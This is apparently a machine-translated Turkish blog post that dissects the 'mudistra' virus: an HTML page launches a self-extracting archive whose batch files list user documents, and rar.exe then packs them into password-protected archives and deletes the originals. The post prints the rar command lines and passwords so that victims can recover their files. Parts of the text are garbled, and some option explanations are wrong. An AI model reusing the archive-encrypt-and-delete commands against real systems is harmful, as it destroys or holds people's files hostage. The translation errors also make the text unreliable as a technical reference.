!!!!TÜMÜNÜ OKUYUN mudistra virüsü ve ondan nasıl kurtulacağınız hakkında

1 dosya index.html açılır

alıntı:

Merhaba!


Yalnızca görünüm alanında görürsünüz Merhaba! ve fall05.exe dosyası da başlatılır

2 fall05.exe = bu kendi kendine açılan bir arşivdir

dosyaları içerir:

1.bat – 5.bat – komut dosyaları

rar.exe – konsol rar’ı

lsas.exe – hayatımda ilk kez qnx’e katılıyorum :), lsas.exe bir virüs değil, rar.exe’yi başlatıyor

1.bat’tan 5.bat’a kadar olan dosyalar önce çalıştırılır, dos komutlarını bilmeyen ve dir -? , oradan / s / b / a tuşlarının yardımıyla dosya listelerini tek bir dosyaya attıklarını bilirlerdi.

mtxoc32.ini’de 1.bat – doc , xls , rtf , mdb , xml , nfo , txt uzantılı dosyalar.

mtml32.ini’de 2.bat – htm , html , css , php , php , cgi.

3.bat emsxpm32.ini’de – mp3.

4.bat ottor32.ini’de – jpg , pdf , lnk.

nvxow32.ini’de 5.bat – psd.

bu lsas başlatıldıktan sonra, rar.exe’yi aşağıdaki parametrelerle başlatır:

a

stertd.rar

-df

-ep2

-hp3.7835186944842E+18

-p3.78355186944842E+18

-tl

-y

-inul

-idp

@mtxoc32.ini

a

abery2.rar

-df

-ep2

-hp-3.03506065330114E+32

-p-3.03506065330114E+32

-tl

-y

-inul

-idp

@mtml32.ini

a

vuentu.rar

-df

-ep2

-hp2,21739596759373E+34

-p2.21739596759373E+34

-tl

-y

-inul

-idp

@emsxpm32.ini

a

menait.rar

-df

-ep2

-hp-2,21739596759373E+34

-p-2.21739596759373E+34

-tl

-y

-inul

-idp

@ottor32.ini

a

mech4e.rar

-df

-ep2

-hp1.62031886613828E+36

-p1.62031886613828E+36

-tl

-y

-inul

-idp

@nvxow32.ini

-df (dosyalar arşivlendikten sonra silinir) -ep2(yolları koru) -hp (şifrele) -p(dosyayı stdout’a yazdır) -tl(arşiv süresini son dosya olarak ayarla) -y (tüm sorulara evet) -inul (devre dışı bırak mesajlar ) -idp (yüzde gösterimini devre dışı bırak)

Kurbanlar: dosyaları bulun

stertd.rar , abery2.rar , vuentu.rar , menait.rar , mech4e.rar ve buradaki şifreleri deneyin

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\zipasswd

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\rapasswd

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\acpasswd

Mudistre prozhka’nız sadece kahkaha ve sempatiye neden oldu

sayacı durdurmak için şifre : $23#7L@:8$g%f27N8)4g*f78T^vg4_f=v7+D6v&32(vDf$65QvfC[7bv7645b+f76;v76]

Fin ve diğer konferans katılımcılarının bana karşı tutumlarını değiştireceklerini içtenlikle umuyorum.

Buradaki yorumlar

veya öğleden sonra

veya sabun igor_19_19@mail.ru

Similar Posts

Leave a Reply

Your email address will not be published.